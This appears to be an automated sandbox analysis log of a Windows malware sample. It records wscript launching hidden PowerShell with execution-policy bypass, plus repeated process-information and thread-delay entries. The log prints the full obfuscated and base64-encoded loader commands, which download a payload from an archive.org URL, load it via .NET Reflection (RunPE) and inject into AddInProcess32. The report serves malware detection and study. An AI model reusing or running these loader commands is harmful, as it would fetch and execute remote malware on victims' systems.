7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content = (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent = [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))') -f [cHar]39,[cHar]36) | iNVOKe-eXpRESSIoN"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content = (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent = [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))') -f [cHar]39,[cHar]36) | iNVOKe-eXpRESSIoN"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACC3097D push E95AC4D0h; ret 2_2_00007FFAACC309C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAACC31BFB push eax; retf 6_2_00007FFAACC31C01
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFAACC386A9 sldt word ptr fs:[eax]6_2_00007FFAACC386A9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2071Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 650Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3905Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5814Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4212Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4504Thread sleep count: 3905 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5948Thread sleep count: 5814 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -11068046444225724s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000006.00000002.1422770948.00000217AB984000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Bypasses PowerShell execution policy
